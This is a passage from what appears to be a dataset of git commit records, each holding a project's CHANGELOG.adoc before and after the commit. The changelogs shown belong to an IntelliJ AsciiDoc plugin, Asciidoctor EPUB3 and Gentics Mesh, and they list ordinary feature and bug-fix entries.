(preview, available from Github releases)\n\n- revised constrained\/unconstrained detection\n- Fix problem in syntax highlighting leading to PSI Parser Exceptions\n- refreshing images on JavaFX only if their content has changed to save memory consumption\n- Limiting JavaFX preview to 64bit platforms due to problems especially with Windows OpenJDK 32bit (as default on Windows).\n\n=== 0.15.0 (preview, available from Github releases)\n\n- correct usage of constrained\/unconstrained AsciiDoc formatting\n- JavaFX Preview will automatically scroll to the cursor position of the editor\n- JavaFX preview will automatically open links in the systems's default browser\n- Caching rendering instances of Asciidoctor for better performance\n\nIntelliJ 15 (including AppCode 3.3, CLion 1.2, DataGrip 1.0, PhpStorm 10, PyCharm 5, RubyMine 8, WebStorm 11) is the new minimum version required for this release.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c7f571efb8389903dede7153837be18bd186d668","subject":"remove wrong changelog for #190, it wasn't fixed","message":"remove wrong changelog for #190, it wasn't fixed\n","repos":"asciidoctor\/asciidoctor-epub3","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"= {project-name} Changelog\n:project-name: Asciidoctor EPUB3\n:uri-repo: https:\/\/github.com\/asciidoctor\/asciidoctor-epub3\n\nThis document provides a high-level view of the changes to the {project-name} by release.\nFor a detailed view of what has changed, refer to the {uri-repo}\/commits\/master[commit history] on GitHub.\n\n== Unreleased\n\n* use imagedir from an image's context during packaging (#282)\n* fix images in tables not included in epub archive (#169)\n* fix inline images not being included in epub archive (#30)\n\n== 1.5.0.alpha.13 (2020-02-04) - @slonopotamus\n\n* remove kindlegen and epubcheck-ruby from runtime dependencies (#288)\n\n== 1.5.0.alpha.12 (2020-02-02) - @slonopotamus\n\n* make kindlegen a runtime dependency so it installs automatically during `gem install asciidoctor-epub3` (#270)\n* make `KINDLEGEN` env var work again (#269)\n* stop adding default front cover image (#180)\n* enable Pygments on non-Windows JRuby platforms (#264)\n* provide a human-readable error message when we fail to find KindleGen (#268)\n* try to use KindleGen\/EPUBCheck binary from `$PATH` (#276)\n* add `ebook-kindlegen-path`\/`ebook-epubcheck-path` attributes to override KindleGen\/EPUBCheck executable location (#276)\n\n== 1.5.0.alpha.11 (2020-01-26) - @slonopotamus\n\n* drop unused dependencies: thread_safe, concurrent-ruby (#234)\n* add support for Unicode characters in chapter IDs (#217)\n* fix sample-book to be a valid book (#196)\n* don't insert quotation marks around quotes (#129)\n* require at least Asciidoctor 1.5.3 (#245)\n* remove Namo Reader font-icon quirk that produced invalid markup (#192)\n* fix the (in)famous `undefined method `to_ios'` when given a document that doesn't follow asciidoctor-epub3 rules (#7)\n* route messages through the logger (#176)\n* update EPUBCheck to 4.2.2.0 (#240)\n* handle invalid `revdate` gracefully (#14)\n* do not post-process EPUBCHECK env var, but use it as-is (#258)\n* disable Pygments on JRuby to prevent hanging (#253)\n* fix ENOENT error when trying to run EPUBCheck on JRuby on Windows (#256)\n* fix ENOENT error when running kindlegen on JRuby on Windows (#154)\n* set up CI for JRuby on Windows (#254)\n\n== 1.5.0.alpha.10 (2020-01-20) - @slonopotamus\n\n* fix deep xrefs between chapters when using Asciidoctor 2 (#210)\n* switch from epubcheck to epubcheck-ruby (#224)\n* set up a test suite (#11)\n* set up rubocop to enforce a consistent code style (#223)\n* use GitHub Actions for CI and release process (#218)\n* fix JS causing malformed XML that prevented footnotes from being displayed in Calibre (#207)\n* fix installing on Windows (#213, #216)\n* upgrade pygments.rb to 1.2.1 (#216)\n* gepub dependency is no longer locked to 1.0.2 and will use latest 1.0.x version\n* fix `-a ebook-validate` not working on Windows (#232)\n\n== 1.5.0.alpha.9 (2019-04-04) - @mojavelinux\n\n* allow converter to be used with Asciidoctor 2 (#185)\n* upgrade gepub (and, indirectly, nokogiri) (#177)\n* add support for start attribute on ordered list\n* don't add end mark to chapter when publication-type is book (#163)\n* drop unsupported versions of Ruby from CI matrix\n\n== 1.5.0.alpha.8 (2018-02-20) - @mojavelinux\n\n* include inline images in EPUB3 archive (#5)\n* allow chapter to begin with level-1 section title by adding support for negative leveloffset (#107)\n* don't transform the chapter title to uppercase (rely on CSS only) (#97)\n* set correct mimetype for TTF files (#120)\n* implement support for the custom xrefstyle for references within a chapter (#132)\n* show correct path of front cover image and the current document when missing (#124)\n* retain ID of block image (#141)\n* retain ID of example block (#143)\n* retain ID of admonition block (#146)\n* transfer role specified on block image to output (#145)\n* handle nil response from pygments.rb (#156)\n* invert the colors for the chapter title (use black on white) (#96)\n* darken font on Kindle Paperwhite devices (#67)\n\n== 1.5.0.alpha.7 (2017-04-18) - @mojavelinux\n\n* generate TOC levels in navigation document based on toclevels attribute (#90)\n* automatically resolve title of reference between documents (#87)\n* fix xref between chapter files (#27)\n* don't include byline in chapter header if the value of the publication-type attribute is book (#86)\n* don't include avatars if value of publication-type attribute is book (#53)\n* make a stronger statement in the README about the dangers of the \u201cSend to Kindle\u201d tool\n* add ebook-compress flag to enable huffdic compression in kindlegen\n* implement embedded to handle AsciiDoc table cell content (#69)\n* go into more depth about how to structure the document in README (#45)\n* explain how to adjust section level of chapters if they use level-2 headings\n* don't add content image to archive more than once (#76)\n* warn when xref cannot be resolved and text is provided (#103)\n* built-in avatar location should respect imagesdir (#2)\n* change admonition icons (#72) (@PrimaryFeather)\n* fix broken refs in bibliography (#19)\n* remove text justification hack (#92)\n* reset @page for CSS3-capable readers\n* detect Calibre, set class attribute on body to calibre-desktop, add page margins\n* force preformatted text to wrap in Gitden\n* add svg property to front matter only if reference to SVG is detected\n* switch from word-wrap to standard overflow-wrap property in stylesheet\n* loosen letter spacing in quote attribute context\n* adjust font size and margins on Gitden; force margins to be set\n* document in README that using vw units causes Aldiko to crash\n* drop trailing semi-colon in value of inline style attributes\n* use standard format (from core) for warning and error messages\n* update terminology in README; use ebook instead of e-book; refer to application as ereader\n* allow front-cover-image to be specified using block image macro (#3)\n* clean auto-generated file names for chapters (#46)\n* register chapter ID in references\n* only wrap open block content in div if id or role is defined (@rvolz)\n* link to EPUB 3.1 spec from README\n* set ebook-format-kf8 attribute when ebook-format is specified as mobi\n* document the front-cover-image attribute properly\n* update adb-push-book script to honor file extension if specified\n* document limitations of applying page-break-* property on Kindle\n* document that Asciidoctor is added as creator if creator attribute is not specified (#68)\n* group optional gems in the :optional group; remove from gemspec\n* upgrade kindlegen gem to 3.0.3\n* upgrade Pygments to 1.1.1 and allow JRuby to install it\n* document that Pygments bw style is used by default\n* honor explicit table width even when autowidth option is set\n* use method_defined? instead of respond_to? to check if method is already defined\n* fix README typo, strong tag misspelled (@neontapir)\n* fix name of bundler gem; add NOKOGIRI_USE_SYSTEM_LIBRARIES to install command\n* state in README that the spine document must only have include directives as content\n\n== 1.5.0.alpha.6 (2016-01-05) - @mojavelinux\n\n* disable text-rendering: optimizeLegibility on Kindle devices (#58)\n* proxy CSS in KF8 format to work around KDP removing font-related CSS rules\n* don't append source when generating mobi file\n* disable -webkit-hyphens to prevent Kindle for Mac from crashing (#26)\n* don't explicitly enable hyphenation\n* disable hyphens in preformatted text\n* don't fail if source block is empty\n* hide style element in body from Aldiko\n* enable Original (Publisher) font option in iBooks client\n* preserve heading & monospaced fonts in Kindle Paperwhite\/Voyage\n* force left justification in listings (fix for Namo)\n* fix documentation regarding uuid attribute (@chkal)\n* add note that currently images must be placed in a directory called images (@chkal)\n* fix file type of avatar image in docs (@chkal)\n* document how to install the pre-release gem (#38)\n* use built-in font names for mobi7 (#56)\n* document the epub3-stylesdir attribute\n* prevent ellipsis from being used in inline code\n* don't include scoped icon CSS in KF8 format\n* remove link color hack for Gitden since its already covered\n* override heading and monospace fonts for non-Kindle epub3 readers\n* wrap simple dd content in span to allow font to be controlled in iBooks\n* enforce use of monospace font for preformatted elements\n* upgrade kindlegen\n* don't allow UI button to wrap\n* remove amzn-mobi from media query in CSS3-only file\n* use CSS property word-wrap instead of word-break\n* remove charset declaration from CSS\n* switch samples to modern AsciiDoc syntax\n\n{uri-repo}\/issues?q=milestone%3Av1.5.0.alpha.6[issues resolved] |\n{uri-repo}\/releases\/tag\/v1.5.0.alpha.6[git tag]\n\n== 1.5.0.alpha.5 (2015-11-01) - @mojavelinux\n\n* implement -o flag (output file) (#31) (@chloerei)\n* implement the converter method for floating_title (#36)\n* don't print kindlegen output if -q flag is used (#34)\n* CLI now identifies as asciidoctor-epub3 (#32)\n\n{uri-repo}\/issues?q=milestone%3Av1.5.0.alpha.5[issues resolved] |\n{uri-repo}\/releases\/tag\/v1.5.0.alpha.5[git tag]\n\n== 1.5.0.alpha.4 (2014-11-28) - @mojavelinux\n\n* set ebook-format-epub3 attribute (#16)\n* add box drawing symbols to M+ 1mn font\n* switch version to 1.5.0.x to align with core\n\n{uri-repo}\/issues?q=milestone%3Av1.5.0.alpha.4[issues resolved] |\n{uri-repo}\/releases\/tag\/v1.5.0.alpha.4[git tag]\n\n== 1.0.0.alpha.3 (2014-08-17) - @mojavelinux\n\n* don't attempt to chdir to DATA_DIR; use full path; for compatibility with AsciidoctorJ\n* fix BOM regexp in JRuby (again)\n* switch sample png avatars to jpg\n* don't install pygments.rb on JRuby\n\n{uri-repo}\/releases\/tag\/v1.0.0.alpha.4[git tag]\n\n== 1.0.0.alpha.2 (2014-08-15) - @mojavelinux\n\n* upgrade to Asciidoctor 1.5.0\n* use new functionality of doctitle method for splitting up doctitle\n* don't put units on line-height in stylesheet\n* use regexp to match the BOM character (used to fix text justification) in JRuby\n\n{uri-repo}\/releases\/tag\/v1.0.0.alpha.2[git tag]\n\n== 1.0.0.alpha.1 (2014-07-29) - @mojavelinux\n\n* initial pre-release\n\n{uri-repo}\/issues?q=milestone%3Av1.0.0.alpha.1[issues resolved] |\n{uri-repo}\/releases\/tag\/v1.0.0.alpha.1[git tag]\n","old_contents":"= {project-name} Changelog\n:project-name: Asciidoctor EPUB3\n:uri-repo: https:\/\/github.com\/asciidoctor\/asciidoctor-epub3\n\nThis document provides a high-level view of the changes to the {project-name} by release.\nFor a detailed view of what has changed, refer to the {uri-repo}\/commits\/master[commit history] on GitHub.\n\n== Unreleased\n\n* use imagedir from an image's context during packaging (#282)\n* fix images in tables not included in epub archive (#169)\n* fix `base_dir` set to wrong value in chapter documents (#190)\n* fix inline images not being included in epub archive (#30)\n\n== 1.5.0.alpha.13 (2020-02-04) - @slonopotamus\n\n* remove kindlegen and epubcheck-ruby from runtime dependencies (#288)\n\n== 1.5.0.alpha.12 (2020-02-02) - @slonopotamus\n\n* make kindlegen a runtime dependency so it installs automatically during `gem install asciidoctor-epub3` (#270)\n* make `KINDLEGEN` env var work again (#269)\n* stop adding default front cover image (#180)\n* enable Pygments on non-Windows JRuby platforms (#264)\n* provide a human-readable error message when we fail to find KindleGen (#268)\n* try to use KindleGen\/EPUBCheck binary from `$PATH` (#276)\n* add `ebook-kindlegen-path`\/`ebook-epubcheck-path` attributes to override KindleGen\/EPUBCheck executable location (#276)\n\n== 1.5.0.alpha.11 (2020-01-26) - @slonopotamus\n\n* drop unused dependencies: thread_safe, concurrent-ruby (#234)\n* add support for Unicode characters in chapter IDs (#217)\n* fix sample-book to be a valid book (#196)\n* don't insert quotation marks around quotes (#129)\n* require at least Asciidoctor 1.5.3 (#245)\n* remove Namo Reader font-icon quirk that produced invalid markup (#192)\n* fix the (in)famous `undefined method `to_ios'` when given a document that doesn't follow asciidoctor-epub3 rules (#7)\n* route messages through the logger (#176)\n* update EPUBCheck to 4.2.2.0 (#240)\n* handle invalid `revdate` gracefully (#14)\n* do not post-process EPUBCHECK env var, but use it as-is (#258)\n* disable Pygments on JRuby to prevent hanging (#253)\n* fix ENOENT error when trying to run EPUBCheck on JRuby on Windows (#256)\n* fix ENOENT error when running kindlegen on JRuby on Windows (#154)\n* set up CI for JRuby on Windows (#254)\n\n== 1.5.0.alpha.10 (2020-01-20) - @slonopotamus\n\n* fix deep xrefs between chapters when using Asciidoctor 2 (#210)\n* switch from epubcheck to epubcheck-ruby (#224)\n* set up a test suite (#11)\n* set up rubocop to enforce a consistent code style (#223)\n* use GitHub Actions for CI and release process (#218)\n* fix JS causing malformed XML that prevented footnotes from being displayed in Calibre (#207)\n* fix installing on Windows (#213, #216)\n* upgrade pygments.rb to 1.2.1 (#216)\n* gepub dependency is no longer locked to 1.0.2 and will use latest 1.0.x version\n* fix `-a ebook-validate` not working on Windows (#232)\n\n== 1.5.0.alpha.9 (2019-04-04) - @mojavelinux\n\n* allow converter to be used with Asciidoctor 2 (#185)\n* upgrade gepub (and, indirectly, nokogiri) (#177)\n* add support for start attribute on ordered list\n* don't add end mark to chapter when publication-type is book (#163)\n* drop unsupported versions of Ruby from CI matrix\n\n== 1.5.0.alpha.8 (2018-02-20) - @mojavelinux\n\n* include inline images in EPUB3 archive (#5)\n* allow chapter to begin with level-1 section title by adding support for negative leveloffset (#107)\n* don't transform the chapter title to uppercase (rely on CSS only) (#97)\n* set correct mimetype for TTF files (#120)\n* implement support for the custom xrefstyle for references within a chapter (#132)\n* show correct path of front cover image and the current document when missing (#124)\n* retain ID of block image (#141)\n* retain ID of example block (#143)\n* retain ID of admonition block (#146)\n* transfer role specified on block image to output (#145)\n* handle nil response from pygments.rb (#156)\n* invert the colors for the chapter title (use black on white) (#96)\n* darken font on Kindle Paperwhite devices (#67)\n\n== 1.5.0.alpha.7 (2017-04-18) - @mojavelinux\n\n* generate TOC levels in navigation document based on toclevels attribute (#90)\n* automatically resolve title of reference between documents (#87)\n* fix xref between chapter files (#27)\n* don't include byline in chapter header if the value of the publication-type attribute is book (#86)\n* don't include avatars if value of publication-type attribute is book (#53)\n* make a stronger statement in the README about the dangers of the \u201cSend to Kindle\u201d tool\n* add ebook-compress flag to enable huffdic compression in kindlegen\n* implement embedded to handle AsciiDoc table cell content (#69)\n* go into more depth about how to structure the document in README (#45)\n* explain how to adjust section level of chapters if they use level-2 headings\n* don't add content image to archive more than once (#76)\n* warn when xref cannot be resolved and text is provided (#103)\n* built-in avatar location should respect imagesdir (#2)\n* change admonition icons (#72) (@PrimaryFeather)\n* fix broken refs in bibliography (#19)\n* remove text justification hack (#92)\n* reset @page for CSS3-capable readers\n* detect Calibre, set class attribute on body to calibre-desktop, add page margins\n* force preformatted text to wrap in Gitden\n* add svg property to front matter only if reference to SVG is detected\n* switch from word-wrap to standard overflow-wrap property in stylesheet\n* loosen letter spacing in quote attribute context\n* adjust font size and margins on Gitden; force margins to be set\n* document in README that using vw units causes Aldiko to crash\n* drop trailing semi-colon in value of inline style attributes\n* use standard format (from core) for warning and error messages\n* update terminology in README; use ebook instead of e-book; refer to application as ereader\n* allow front-cover-image to be specified using block image macro (#3)\n* clean auto-generated file names for chapters (#46)\n* register chapter ID in references\n* only wrap open block content in div if id or role is defined (@rvolz)\n* link to EPUB 3.1 spec from README\n* set ebook-format-kf8 attribute when ebook-format is specified as mobi\n* document the front-cover-image attribute properly\n* update adb-push-book script to honor file extension if specified\n* document limitations of applying page-break-* property on Kindle\n* document that Asciidoctor is added as creator if creator attribute is not specified (#68)\n* group optional gems in the :optional group; remove from gemspec\n* upgrade kindlegen gem to 3.0.3\n* upgrade Pygments to 1.1.1 and allow JRuby to install it\n* document that Pygments bw style is used by default\n* honor explicit table width even when autowidth option is set\n* use method_defined? instead of respond_to? to check if method is already defined\n* fix README typo, strong tag misspelled (@neontapir)\n* fix name of bundler gem; add NOKOGIRI_USE_SYSTEM_LIBRARIES to install command\n* state in README that the spine document must only have include directives as content\n\n== 1.5.0.alpha.6 (2016-01-05) - @mojavelinux\n\n* disable text-rendering: optimizeLegibility on Kindle devices (#58)\n* proxy CSS in KF8 format to work around KDP removing font-related CSS rules\n* don't append source when generating mobi file\n* disable -webkit-hyphens to prevent Kindle for Mac from crashing (#26)\n* don't explicitly enable hyphenation\n* disable hyphens in preformatted text\n* don't fail if source block is empty\n* hide style element in body from Aldiko\n* enable Original (Publisher) font option in iBooks client\n* preserve heading & monospaced fonts in Kindle Paperwhite\/Voyage\n* force left justification in listings (fix for Namo)\n* fix documentation regarding uuid attribute (@chkal)\n* add note that currently images must be placed in a directory called images (@chkal)\n* fix file type of avatar image in docs (@chkal)\n* document how to install the pre-release gem (#38)\n* use built-in font names for mobi7 (#56)\n* document the epub3-stylesdir attribute\n* prevent ellipsis from being used in inline code\n* don't include scoped icon CSS in KF8 format\n* remove link color hack for Gitden since its already covered\n* override heading and monospace fonts for non-Kindle epub3 readers\n* wrap simple dd content in span to allow font to be controlled in iBooks\n* enforce use of monospace font for preformatted elements\n* upgrade kindlegen\n* don't allow UI button to wrap\n* remove amzn-mobi from media query in CSS3-only file\n* use CSS property word-wrap instead of word-break\n* remove charset declaration from CSS\n* switch samples to modern AsciiDoc syntax\n\n{uri-repo}\/issues?q=milestone%3Av1.5.0.alpha.6[issues resolved] |\n{uri-repo}\/releases\/tag\/v1.5.0.alpha.6[git tag]\n\n== 1.5.0.alpha.5 (2015-11-01) - @mojavelinux\n\n* implement -o flag (output file) (#31) (@chloerei)\n* implement the converter method for floating_title (#36)\n* don't print kindlegen output if -q flag is used (#34)\n* CLI now identifies as asciidoctor-epub3 (#32)\n\n{uri-repo}\/issues?q=milestone%3Av1.5.0.alpha.5[issues resolved] |\n{uri-repo}\/releases\/tag\/v1.5.0.alpha.5[git tag]\n\n== 1.5.0.alpha.4 (2014-11-28) - @mojavelinux\n\n* set ebook-format-epub3 attribute (#16)\n* add box drawing symbols to M+ 1mn font\n* switch version to 1.5.0.x to align with core\n\n{uri-repo}\/issues?q=milestone%3Av1.5.0.alpha.4[issues resolved] |\n{uri-repo}\/releases\/tag\/v1.5.0.alpha.4[git tag]\n\n== 1.0.0.alpha.3 (2014-08-17) - @mojavelinux\n\n* don't attempt to chdir to DATA_DIR; use full path; for compatibility with AsciidoctorJ\n* fix BOM regexp in JRuby (again)\n* switch sample png avatars to jpg\n* don't install pygments.rb on JRuby\n\n{uri-repo}\/releases\/tag\/v1.0.0.alpha.4[git tag]\n\n== 1.0.0.alpha.2 (2014-08-15) - @mojavelinux\n\n* upgrade to Asciidoctor 1.5.0\n* use new functionality of doctitle method for splitting up doctitle\n* don't put units on line-height in stylesheet\n* use regexp to match the BOM character (used to fix text justification) in JRuby\n\n{uri-repo}\/releases\/tag\/v1.0.0.alpha.2[git tag]\n\n== 1.0.0.alpha.1 (2014-07-29) - @mojavelinux\n\n* initial pre-release\n\n{uri-repo}\/issues?q=milestone%3Av1.0.0.alpha.1[issues resolved] |\n{uri-repo}\/releases\/tag\/v1.0.0.alpha.1[git tag]\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"6b2fc8ff6b41757cb22262d9993aa25545e64810","subject":"Add changelog entry for GPG keys","message":"Add changelog entry for GPG keys\n","repos":"gentics\/mesh,gentics\/mesh,gentics\/mesh,gentics\/mesh","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"---\ntitle: Changelog\n---\n\ninclude::content\/docs\/variables.adoc-include[]\n\n\/\/\/\/\n* Write changelog entries in present tense\n* Include GitHub issue or PR if possible using link:http:\/\/...[#123] format\n* Review your changelog entries\n* Don't include security sensitive information in the changelog\n* Include links to documentation if possible\n\/\/\/\/\n\n= Gentics Mesh Changelog\n\n[[expected]]\n== Planned Future Changes\n\n* With the release of `\/api\/v2` of the API, v1 has been deprecated. Version 2 introduced changes in the GraphQL API only. See the note in the changelog for link:#v0.35.0[v0.35.0] for details. The `\/api\/v1` still works like before, we will however cease support for `\/api\/v1` in the future. The Java REST client still uses v1 per default but can be set to v2. We advise to do so while `\/api\/v1` is still supported to prevent failures in the future.\n\n* The `html` field type will be removed in the future. Instead the `string` type will be used in combination with an additional configuration property for this field in the schema. Of course, your existing schemas will be migrated for you.\n\n* The support for the embedded Elasticsearch will be dropped in the future. It is highly recommended to link:{{< relref \"elasticsearch.asciidoc\" >}}#_dedicated_elasticsearch[setup Elasticsearch as a dedicated service].\n\n* The Mesh Server will require Java 11 with the release of 2.0.0. The runtime support for Java 8 will be dropped. The Mesh Java REST client will still be usable with Java 8.\n\n[[Unreleased]]\n\nicon:plus[] Core: The amount of the deployed REST API verticles can now be link:{{< relref \"administration-guide.asciidoc\" >}}#_httpsssl[configured] and its default has been changed from 5 to 2 * CPU Cores.\n\nicon:plus[] Core: It is now possible to use Gentics Mesh in read only mode. Take a look at the link:{{< relref \"administration-guide.asciidoc\" >}}#readonly[documentation] for more information.\n\nicon:check[] REST: The `\/health\/live` and `\/health\/ready` endpoints have been added to the REST API. These endpoints are also available on the monitoring server, but adding them to the REST server makes it possible for load balancers to monitor the server on the same port that used to proxy the requests.\n\nicon:plus[] Core: The core Vert.x library was updated to version `3.8.4`.\n\nicon:plus[] Core: The core plugin framework library was updated to version `2.1.0`.\n\nicon:plus[] Security: Build artifacts for Gentics Mesh will now be cryptographically signed using GPG.\n\n[[v1.2.1]]\n== 1.2.1 (22.11.2019)\n\nicon:check[] Core: Mesh now uses a different parser for processing `*.docx` and `*.pptx` files. Parsing these files will now require far less memory.\n\nicon:check[] GraphQL: Fixed fetching node references from users. link:https:\/\/github.com\/gentics\/mesh\/issues\/393[#393] link:https:\/\/github.com\/gentics\/mesh\/issues\/934[#934]\n\nicon:check[] Java Rest Client: Fixed a bug that some generic methods would not allow response objects of any class.\n\n\n[[v1.2.0]]\n== 1.2.0 (20.11.2019)\n\nWARNING: The internal database structure has changed significantly to avoid vertices with many edges. This will result in a higher write performance on bigger systems. For this change, the API of Gentics Mesh did not change at all. When starting with this version on an existing database, the structure changes will be applied automatically, which will take some time to complete.\n\nCAUTION: If you are running Gentics Mesh in cluster mode, you need to link:{{< relref \"clustering.asciidoc\" >}}#_setup[initialize the cluster again]. You must use the `-initCluster` command line argument or set the `MESH_CLUSTER_INIT` to `true` on one of the master instances of the cluster.\n\nicon:check[] Java Rest Client: Generic methods (`get`, `post`, `put`, `delete`) now allow response objects of any class.\n\nicon:check[] UI: The UI has been updated to version link:https:\/\/github.com\/gentics\/mesh-ui\/blob\/develop\/CHANGELOG.md#110---2019-11-20[1.1.0].\n\n[[v1.1.1]]\n== 1.1.1 (11.11.2019)\n\nicon:plus[] GraphQL: The GraphQL Endpoint now supports the `wait` query-parameter like the Search Endpoint does. link:https:\/\/github.com\/gentics\/mesh\/issues\/805[#805]\n\nicon:plus[] Clustering: The role of an instance has been added to the link:https:\/\/getmesh.io\/docs\/api\/#admin_cluster_status_get[cluster status response].\n\nicon:check[] Core: Some optimizations to uploading binaries have been made.\n\nicon:check[] Core: Fixed an issues that sometimes caused errors when performing write requests during a schema migration.\n\nicon:check[] UI: The UI has been updated to version link:https:\/\/github.com\/gentics\/mesh-ui\/blob\/develop\/CHANGELOG.md#102---2019-11-11[1.0.2].\n\n[[v1.1.0]]\n== 1.1.0 (29.10.2019)\n\nWARNING: The internal monitoring library has been changed from dropwizard to link:https:\/\/micrometer.io\/[micrometer]. This allows better labeling of various metrics for link:https:\/\/prometheus.io\/[Prometheus]. With this change, some metrics names from Vert.x have been changed. See link:https:\/\/vertx.io\/docs\/vertx-micrometer-metrics\/java\/#_vert_x_core_tools_metrics[here] for the new list of Vert.x metrics. By default, JVM metrics are also recorded. This can be configured in the link:{{< relref \"administration-guide.asciidoc\" >}}#_monitoring_options[monitoring options]. Also, the response structure in the `\/search\/status` endpoint has changed. Take a look at the link:https:\/\/getmesh.io\/docs\/api\/#search_status_get[API docs] for a new example.\n\nicon:plus[] Search: A new setting has been added which can be used to enable Elasticsearch 7 support. The `search.complianceMode` setting in the `mesh.yml` file can be used to control the compliance mode for Elasticsearch support. The setting can also be controlled via the `MESH_ELASTICSEARCH_COMPLIANCE_MODE` environment variable. Currently there are two modes: `ES_7` for Elasticsearch 7.x and `ES_6` for Elasticsearch 6.x.\nBy default `ES_6` will be used thus no changes are required for existing installations.\n\nicon:plus[] Core: A new endpoint for administration has been added. The `\/admin\/debuginfo` endpoint lets you gain various informations about the system. Take a look at the link:{{< relref \"administration-guide.asciidoc\" >}}#debuginfo[administration guide] for details.\n\nicon:plus[] Monitoring: New metrics for caching statistics have been added. Take a look at the link:{{< relref \"monitoring.asciidoc\" >}}#metrics[documentation] for the new metrics.\n\nicon:check[] OrientDB: The included OrientDB version has been updated to version 3.0.24\n\nicon:check[] Core: Some extensive logging messages will now only be logged on a finer log level. These include error messages for GraphQL queries, on closed client connections and requests sent to Elasticsearch.\n\n[[v1.0.2]]\n== 1.0.2 (11.10.2019)\n\nicon:check[] Core: The internal memory usage has been reduced.\n\n[[v1.0.1]]\n== 1.0.1 (08.10.2019)\n\nicon:check[] UI: The UI has been updated to version link:https:\/\/github.com\/gentics\/mesh-ui\/blob\/develop\/CHANGELOG.md#101---2019-10-08[1.0.1]\n\nicon:plus[] Core: Link resolving now supports branches. Take a look at the link:{{< relref \"features.asciidoc\" >}}#linkresolvingbranches[documentation] for more information. link:https:\/\/github.com\/gentics\/mesh-incubator\/issues\/38[#38]\n\n[[v1.0.0]]\n== 1.0.0 (03.10.2019)\n\nicon:bullhorn[] New UI\n\n[quote]\n____\n\nThis version of Gentics Mesh contains the a new UI which is accessible via `\/mesh-ui`. The old UI is still part of this release and can be accessed via `\/mesh-ui-v1`.\n\nThe following noteworthy aspects of the UI have been updated \/ altered:\n\n* The permission management has been reworked\n* The new schema editor which features autocompletion\n* The usability of the edit view has been enhanced\n* The editor for HTML fields has been replaced\n* A new image editor has been added which now supports focal point handling\n* Language handling has been improved\n* The UI no longer depends on Elasticsearch\n____\n\nicon:bullhorn[] New defaults\n\n[quote]\n____\n\nFor new server installations (`mesh-server`) the Elasticsearch embedded server will no longer be enabled by default. The demo server (`mesh-demo`) will still start the embedded Elasticsearch server for ease of use.\nIt is still possible to enable the embedded server via the `search.startEmbedded: true` and `search.url: http:\/\/localhost:9200` settings in the `mesh.yml` file.\n____\n\n\nicon:check[] Search: Synchronizing the search index when starting after Gentics Mesh has not been stopped properly will not block the startup routine anymore. link:https:\/\/github.com\/gentics\/mesh\/issues\/862[#862]\n\nicon:check[] Core: Path resolving performance has been increased.\n\n[[v0.41.0]]\n== 0.41.0 (01.10.2019)\n\nicon:plus[] REST: The ETag generation was reworked. This means that previously generated ETags are no longer valid.\n\nicon:check[] REST: Fixed ETag generation when `fields` or `rolePerms` was used. Previously these parameters did not affect the ETag. link:https:\/\/github.com\/gentics\/mesh\/issues\/881[#881]\n\nCAUTION: Reworked OAuth2 \/ OIDC support\n\n[quote]\n____\n\nThe `security.oauth2` configuration section was removed. Instead the `security.publicKeysPath` property was added.\n\nIn order to provide support for more authentication providers it is now possible to specify the path to a file which contains the public keys in the configuration. These keys will be used to validate the access tokens.\n\nYou can read more about how to setup OAuth2 \/ OIDC in the link:{{< relref \"authentication.asciidoc\" >}}#_oauth2_oidc[OAuth2 \/ OIDC] guide.\n\nIt is now also possible for Authentication Service Plugins to provide Json Web Keys (JWK) to Gentics Mesh. Plugins can load the accepted JWK's from the authentication provider server and return it to Gentics Mesh. A plugin has to implement the `getPublicKeys()` method to support this.\n\nPlugins can now implement the `extractUsername()` method to return the username that should be used to handle mappings between Mesh and JWT.\n\nPlease note that installations which already use an authentication plugin can either update the plugin and provide the public keys or manually add the public key to the `public-keys.json` configuration file.\n____\n\n\n[[v0.40.3]]\n== 0.40.3 (13.09.2019)\n\nicon:plus[] Java Rest Client: Various new methods have been added to handle endpoint agnostic requests (`get(), post(), delete(), put()`). These methods can be used to handle plugin requests.\n\nicon:check[] Migration: It is now possible to apply schema \/ microschema changes that include the `name` property via the `changes` endpoint. Previously the name property was not utilized.\n\n[[v0.40.2]]\n== 0.40.2 (09.09.2019)\n\nicon:plus[] Core: It is now possible to configure the transaction retry limit using the `MESH_GRAPH_TX_RETRY_LIMIT` environment variable or the `storage.txRetryLimit` parameter.\n\nicon:check[] Core: The default value for `storage.synchronizeWrites` has been changed to `true`.\n\nicon:check[] Core: The default value for the OrientDB parameter `tx.retry.delay` has been increased to 10ms, and the constant delay will be used instead of growing linearly. It is now possible to configure the delay via the `MESH_GRAPH_TX_RETRY_DELAY` environment variable.\n\nicon:check[] Config: It is now possible to override the mapping mode with the `MESH_ELASTICSEARCH_MAPPING_MODE` environment variable. link:https:\/\/github.com\/gentics\/mesh\/issues\/878[#878]\n\n[[v0.40.1]]\n== 0.40.1 (06.09.2019)\n\nCAUTION: REST: When updating permissions to an element, unset permissions in the request will not change these permissions anymore. Previously, unset permission were set to false.\n\nicon:check[] Core: Various handlers were blocking the event loop when run. This has been fixed now.\n\nicon:check[] Core: Fixed delayed initialization of `VersionPurgeJobImpl` vertices. Previously the type was not setup during start up and this resulted in a warning when the type was first used.\n\nicon:plus[] Java Rest Client: The `createSchema()` methods now accept a `ParameterProvider` vararg parameter.\n\nicon:check[] Core: Schema validation will no longer fail by default, when Elasticsearch is not available. The previous behavior can be enforced by adding `?strictValidation=true`.\n\nicon:check[] GraphQL: Fixed a bug that prevented loading of permissions of an element.\n\nicon:plus[] GraphQL: Added the `rolePerms` field to mesh elements. This allows you to load permissions of a role, similar to the link:{{< relref \"features.asciidoc\" >}}#_querying_permissions[`?role` query parameter in REST].\n\n[[v0.40.0]]\n== 0.40.0 (27.08.2019)\n\nicon:bullhorn[] Image Manipulation: The new resizing options `smart`, `prop` and `force` have been added.\n\n[quote]\n____\n\n**force**\n\nThe `?resize=force` mode will resize the image to the specified dimensions. This can lead to a distorted image when the aspect ratio of the source image does not match the destination aspect ratio.\n\n**smart**\n\nWhen using `?resize=smart` the resizer will automatically crop the image to the desired dimensions instead of distorting it when providing `width` _and_ `height` parameters which would result in an aspect ratio that is different from the original images aspect ratio.\n\nThe new default image resize mode is `smart` which potentially crops an image when requested aspect ratio that diverge from the source images aspectratio. The old behaviour can now be achieved by using the `?resize=force` parameter.\n\n**prop**\n\nThe `?resize=prop` mode will resize the image proportionally 